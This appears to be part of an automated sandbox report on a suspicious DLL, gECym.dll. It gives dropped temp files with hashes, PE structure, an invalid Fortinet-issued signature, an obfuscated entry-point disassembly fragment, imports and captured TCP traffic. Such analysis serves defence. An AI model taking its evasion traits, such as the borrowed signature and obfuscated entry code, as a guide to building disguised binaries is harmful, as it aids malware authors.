                                                              SHA-256:D1273EDCD6D95D4D85DC4F1F090A939C59D9B88E01F6B5DB815506A180D4DE6A
                                                              SHA-512:01725A4426637D7770EBCB78CA365C13DAD5095B5D7BAB96F7CB93E4921BBD40CD7E82B6F9F864B50EC0435564CF584F4CAC20C8D7E3EA16C0E08081F06D6D13
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x29b46a73,0x01d7c5ff</date><accdate>0x29d29f72,0x01d7c5ff</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                              C:\Users\user\AppData\Local\Temp\~DF062D96AA82264A2D.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.08578582712352636
                                                              Encrypted:false
                                                              SSDEEP:3:NUofhQ0SA/WU/lg/lclllv/nt+lybltll1lRslkhlEkll/aEhh4V7:fpQ/AecgUFAlkxHbh4V7
                                                              MD5:A290D9C564235C12A4957F7722B9C169
                                                              SHA1:DE05A28BE040AA95C2D8D6A6CC15780A22C98032
                                                              SHA-256:4763A26542D87F93254C9A1BE3DE157209CE44AEEE8225E2C45E8CC4C945E71B
                                                              SHA-512:DB37057AF3CFDDCBF6252D32D5C11D7134D3C90DEF8F4062A526B3C5B28A5AB31354EC4BE00381CE85D6D83CFAEFE49DCD2B6F59EBF930F1BE899CE497529781
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF1D0E3EB87BA124E4.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.06045461972774207
                                                              Encrypted:false
                                                              SSDEEP:3:alFXEAUolllfltE3lX9/Dl/Oly3lgHl0llftRslkhlEkllM+lylhllAlFJejl+lE:a/vllsngF0/AlkxFIBGKjEW1
                                                              MD5:9FFCF967410609EAB508F254E7CA6AA2
                                                              SHA1:061671A355104728137C16CDEC077B7312545F36
                                                              SHA-256:A3EC8754D1131E7E3F9E35A5EA52257B5CAE7686F3F4355DA048AC16F4A30E98
                                                              SHA-512:11D215E25AFE2EB70C54C54C6B4E3125382C842324889FFC15E1B9F0E333C04473E9A8EED6FBDA0C09478693811EF46EFE97A16D08209EF00496B98AFD6B6973
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF21F93D34852E97E1.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.06045461972774207
                                                              Encrypted:false
                                                              SSDEEP:3:alFXEAUolllfltE3lX9/Dl/Oly3lgHl0llftRslkhlEkllM+lylhllAlFJejl+lE:a/vllsngF0/AlkxFIBGKjEW1
                                                              MD5:9FFCF967410609EAB508F254E7CA6AA2
                                                              SHA1:061671A355104728137C16CDEC077B7312545F36
                                                              SHA-256:A3EC8754D1131E7E3F9E35A5EA52257B5CAE7686F3F4355DA048AC16F4A30E98
                                                              SHA-512:11D215E25AFE2EB70C54C54C6B4E3125382C842324889FFC15E1B9F0E333C04473E9A8EED6FBDA0C09478693811EF46EFE97A16D08209EF00496B98AFD6B6973
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF61B4A5E235D16C22.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):176128
                                                              Entropy (8bit):3.348410225065147
                                                              Encrypted:false
                                                              SSDEEP:3072:cZ/2Bfcdmu5kgTzGtPZ/2Bfc+mu5kgTzGt:VA
                                                              MD5:1BC9D33003AE79A9DC826B9177CE4107
                                                              SHA1:E2FE82C8A27AB5D6FEB48FC0036F41BE4F2753FF
                                                              SHA-256:76493F5DDC21ABC9D0FC4172AC29CE56937AF95407FA16AF758741BD8B99C4A7
                                                              SHA-512:E85C349FB6DA0E3FC7C7C215D3BC919330D9415898894F29AB806161D5AE2854389CED20A5231772E23C0DE03971D2E7C30467FC094012ECE8C20D5B97E780BD
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\~DF9813413A47FA9BB0.TMP
                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.05700439027613612
                                                              Encrypted:false
                                                              SSDEEP:3:alFXEAUolllHlly+lllX9/Dl/Oly3lgHlXXlRslkhlEkllM+lylhllAlFJejltl:a/vllrNngFAlkxFIBGKj1
                                                              MD5:BAE4F7A74A5A11C6C051F0918C1CECEF
                                                              SHA1:C352D244D87037DE12A8995C84FF85B517F333CE
                                                              SHA-256:8BC3D5AA4632E5A49AD6B02696D9535763AF4CE8D940695035F6EBED411098AE
                                                              SHA-512:B5F643956DEB154C4604ACD45FDE9DD8FF6CF6B4B0801DFA80B96D5A64ED7D37F095BBB2C67D09DC6895C32017B20551996E5387DFB9B34DF494237FB53A40E0
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:MS-DOS executable, MZ for MS-DOS
                                                              Entropy (8bit):6.669453102824052
                                                              TrID:
                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                              • DOS Executable Generic (2002/1) 0.20%
                                                              • VXD Driver (31/22) 0.00%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:gECym.dll
                                                              File size:263072
                                                              MD5:fcb53acd5fd1637a2ac1bc69f396e92c
                                                              SHA1:a09432a56375c5a39856d59e402c3f8642edda7b
                                                              SHA256:cc7045d9fe77c4aa4cb646d01fb4700008a34f58f49358d0b0b0997d21016aab
                                                              SHA512:47bcd8326a65b2a50ee7a9691853c6a6d6a424ad4e0a7760794aa20c137450017793ed9756302666b6b1aed93048d879395a6fde2c95f9b9fc67ca4bd6e38116
                                                              SSDEEP:3072:eb/VDsMK5SdPlKCXbkB9Kv1y5Gun6XKwRDcXEX55d2wNQ+XnwEf4bvuQ5OjrDGZt:WCoMRt6XKUSRACdOj57jY5jM9H8eGN
                                                              File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L...8yoa...........!.........................................................P......z................................@.....

                                                              File Icon

                                                              Icon Hash:70e8d0dcbc30f462

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x100095ff
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x10000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                              DLL Characteristics:
                                                              Time Stamp:0x616F7938 [Wed Oct 20 02:04:40 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:91478fc94f6cfd55f2f79a8b82441b87

                                                              Authenticode Signature

                                                              Signature Valid:false
                                                              Signature Issuer:CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                              Signature Validation Error:The digital signature of the object did not verify
                                                              Error Number:-2146869232
                                                              Not Before, Not After
                                                              • 7/29/2015 5:00:00 PM 7/29/2018 4:59:59 PM
                                                              Subject Chain
                                                              • CN=Fortinet Technologies (Canada) Inc., O=Fortinet Technologies (Canada) Inc., L=Burnaby, S=British Columbia, C=CA
                                                              Version:3
                                                              Thumbprint MD5:CED7C13C8B94994AFFCC6AD7B7DF388F
                                                              Thumbprint SHA-1:B27F938A1E7F314A7B60C48EA196961CDAA09F7A
                                                              Thumbprint SHA-256:3C658DDCD37DFA65F69C0B35697EDAA12DBDF68388A9AD54BBEFCF24F786ABB7
                                                              Serial:5755C3BFA958E29EF9DCA3FBA9FC02D4

                                                              Entrypoint Preview

                                                              Instruction
                                                              xor edi, edi
                                                              push edi
                                                              push edi
                                                              call dword ptr [100049F4h]
                                                              mov edi, eax
                                                              jmp 00007F2CF4914D60h
                                                              mov ecx, dword ptr [edx-08h]
                                                              lea ecx, dword ptr [ebp-18h]
                                                              int3
                                                              push esi
                                                              mov eax, 004159B8h
                                                              int3
                                                              jmp dword ptr [0041271Ch]
                                                              mov ebp, esp
                                                              jmp 00007F2CF4902914h
                                                              inc esi
                                                              pop ebp
                                                              int3
                                                              xor ecx, eax
                                                              call 00007F2CF49012EEh
                                                              xor edx, dword ptr [ebp+28h]
                                                              add edx, 46h
                                                              xor edx, edx
                                                              add edx, 3077A3CDh
                                                              xor edx, dword ptr [1003B15Bh]
                                                              add edx, 01h
                                                              xor edx, dword ptr [ebp+24h]
                                                              mov dword ptr [1003BD39h], edx
                                                              mov esi, edx
                                                              add esi, D6F0E4A5h
                                                              sub esi, dword ptr [ebp+28h]
                                                              add esi, 648A3A98h
                                                              xor esi, 72h
                                                              mov dword ptr [ebp+14h], esi
                                                              push 10018AA4h
                                                              ret
                                                              jne 00007F2CF4903086h
                                                              mov eax, 00416654h
                                                              int3
                                                              jmp dword ptr [004126F8h]
                                                              call 00007F2CF490245Fh
                                                              int3
                                                              jmp dword ptr [004121ACh]
                                                              int3
                                                              int3
                                                              jmp dword ptr [0041271Ch]
                                                              jmp 00007F2CF4902A43h
                                                              xor esi, esi
                                                              add esi, dword ptr [1003C07Dh]
                                                              sub esi, 284AC1ACh
                                                              add esi, dword ptr [1003C34Dh]
                                                              mov dword ptr [1003C34Dh], esi
                                                              push 1003491Ah
                                                              push 1003568Ah
                                                              call dword ptr [10004ADCh]

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x400c0x84.text
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4ba80xa0.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x1020.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x3e6000x1da0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x420000x27e4.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x49b80x1f0.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x1b22d0x1b400False0.555260894495data6.48316057239IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rdata0x1d0000x1f00x200False0.49609375COM executable for DOS3.58053780946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x1e0000x21a2a0x1e600False0.583116319444data6.017622124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x400000x10200x1200False0.330512152778data3.17732875516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x420000x27e40x2800False0.80029296875data6.81110960286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x401c00x8a8dataEnglishUnited States
                                                              RT_ICON0x40a680x2e8dataEnglishUnited States
                                                              RT_STRING0x40d500x40dataEnglishUnited States
                                                              RT_STRING0x40d900x74dataEnglishUnited States
                                                              RT_GROUP_ICON0x40e040x14dataEnglishUnited States
                                                              RT_GROUP_ICON0x40e180x14dataEnglishUnited States
                                                              RT_VERSION0x40e2c0x1f4dataEnglishUnited States

                                                              Imports

                                                              DLLImport
                                                              kbdal.dllKbdLayerDescriptor
                                                              kernel32.dllQueryPerformanceFrequency, GetCurrentThreadId, VirtualProtect, WaitForSingleObjectEx, QueryPerformanceCounter, EnterCriticalSection, CreateDirectoryW, GlobalFree, GetStartupInfoW, AttachConsole, SetCurrentDirectoryW, WaitForSingleObject, GlobalLock, LocalAlloc, GetTempPathW, GetCurrentProcess, GetTickCount, GetLastError, GetModuleHandleW, AllocConsole, FindNextFileW, SetEvent, LocalFree, ResetEvent, ReadConsoleW, GlobalUnlock, IsProcessorFeaturePresent, Sleep, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, FindClose, GetSystemDefaultUILanguage, GetStdHandle, InitializeSListHead, OpenProcess, CloseHandle, CreateWaitableTimerW, CreateEventW, GetModuleHandleA, TerminateProcess, GetUserDefaultUILanguage, LeaveCriticalSection, SetConsoleTitleW, SetWaitableTimer, WriteConsoleW, DeleteCriticalSection, FindFirstFileW, GetCurrentProcessId, GetCommandLineW, SetUnhandledExceptionFilter, SetConsoleTextAttribute, UnhandledExceptionFilter, GlobalSize, GetProcAddress
                                                              ole32.dllPropVariantClear, StringFromGUID2, CoUninitialize, RegisterDragDrop, CreateItemMoniker, CreateStreamOnHGlobal, GetRunningObjectTable, OleInitialize, CoCreateInstance, OleUninitialize, RevokeDragDrop, CoCreateGuid, CoTaskMemFree, CoInitializeEx
                                                              shell32.dllSHChangeNotify, CommandLineToArgvW, ShellExecuteW
                                                              shlwapi.dllPathCompactPathExW, PathFindExtensionW, PathBuildRootW, PathGetDriveNumberW, PathStripPathW, PathRemoveExtensionW, PathIsNetworkPathW
                                                              user32.dllGetClientRect, RegisterClipboardFormatW, IsWindow, SetKeyboardState, SetCapture, GetKeyboardState, ReleaseCapture, TranslateMessage, GetWindowRect, GetWindowInfo, SetWindowLongW, IsWindowVisible, ShowWindow, GetParent, LoadIconW, ClientToScreen, ScreenToClient, TrackPopupMenu, MsgWaitForMultipleObjectsEx, DestroyMenu, GetSystemMetrics, IsIconic, GetKeyState, GetCursorPos, RegisterClassW, GetWindowLongW, SetWindowPos, PostMessageW, IsClipboardFormatAvailable, DispatchMessageW, MessageBoxW, SetCursorPos, AppendMenuW, CreatePopupMenu, SetCursor, CreateWindowExW, DefWindowProcW
                                                              wmpshell.dllDllUnregisterServer

                                                              Exports

                                                              NameOrdinalAddress
                                                              DllUnregisterServer10x10006e4f
                                                              DllRegisterServer20x1000dfa9
                                                              DllGetClassObject30x10013662
                                                              DllCanUnloadNow40x1001658e

                                                              Version Infos

                                                              DescriptionData
                                                              InternalNameSimilative
                                                              PrivateBuildCrystallic
                                                              LegalTrademarksCodeine
                                                              FileVersion6, 7, 8, 6
                                                              CompanyNameStar Force
                                                              Translation0x0409 0x04e4

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 20, 2021 15:08:35.889739037 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.889781952 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.889837980 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.889863014 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.889867067 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.890306950 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.891561031 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.891627073 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.892085075 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.892107010 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.932991982 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.933101892 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.939477921 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.939654112 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.939768076 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.939785957 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.940016985 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.940082073 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.940695047 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.949043036 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.949062109 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.949428082 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.949606895 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.972785950 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.972893000 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:35.972942114 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.972973108 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.975054026 CEST49784443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:35.975086927 CEST44349784104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:42.157363892 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.157413960 CEST44349820104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.157511950 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.159472942 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.159528971 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.159689903 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.161057949 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.161096096 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.176109076 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.176148891 CEST44349820104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.210551977 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.210813046 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.214256048 CEST44349820104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.214443922 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.306514978 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.306580067 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.307080984 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.307097912 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.307351112 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.307446957 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.315216064 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.315546036 CEST44349820104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.315674067 CEST49820443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338458061 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338540077 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338579893 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338610888 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338618040 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338632107 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338684082 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338690042 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338704109 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338733912 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338762999 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338767052 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338778019 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338808060 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338845968 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338855982 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338876009 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:42.338898897 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.338929892 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.683657885 CEST49821443192.168.2.5104.26.7.139
                                                              Oct 20, 2021 15:08:42.683698893 CEST44349821104.26.7.139192.168.2.5
                                                              Oct 20, 2021 15:08:50.291220903 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.291261911 CEST44349824172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.291372061 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.295773029 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.295825005 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.295924902 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.303937912 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.303991079 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.312355995 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.312412977 CEST44349826104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.312592030 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.314461946 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.314502954 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.319432020 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.319477081 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.319484949 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.364216089 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.364347935 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.364407063 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.364474058 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.366620064 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.366776943 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.391625881 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.391660929 CEST44349824172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.398144007 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.398180962 CEST44349826104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.405420065 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.405445099 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.405740976 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.405746937 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.405890942 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.405967951 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.410784006 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.410813093 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.411187887 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.411247969 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.411518097 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.429982901 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.430090904 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.430093050 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.430143118 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.434802055 CEST44349826104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.434899092 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.435770988 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.435842991 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.435859919 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.435877085 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.435908079 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.435935020 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.439907074 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.440288067 CEST44349826104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.440395117 CEST49826443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.442406893 CEST44349824172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.442539930 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.459805965 CEST49825443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.459852934 CEST44349825172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.471353054 CEST49827443192.168.2.5104.26.3.70
                                                              Oct 20, 2021 15:08:50.471389055 CEST44349827104.26.3.70192.168.2.5
                                                              Oct 20, 2021 15:08:50.476639986 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.476687908 CEST44349824172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.477035999 CEST44349824172.217.168.38192.168.2.5
                                                              Oct 20, 2021 15:08:50.477119923 CEST49824443192.168.2.5172.217.168.38
                                                              Oct 20, 2021 15:08:50.924978971 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:50.925075054 CEST44349785104.20.184.68192.168.2.5
                                                              Oct 20, 2021 15:08:50.925162077 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:50.925190926 CEST49785443192.168.2.5104.20.184.68
                                                              Oct 20, 2021 15:08:55.885663986 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.885710001 CEST44349832151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.885741949 CEST49833443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.885788918 CEST44349833151.101.1.44192.168.2.5
                                                              Oct 20, 2021 15:08:55.885802984 CEST49832443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.885812044 CEST49834443192.168.2.5151.101.1.44
                                                              Oct 20, 2021 15:08:55.885848045 CEST44349834151.101.1.44192.168.2.5
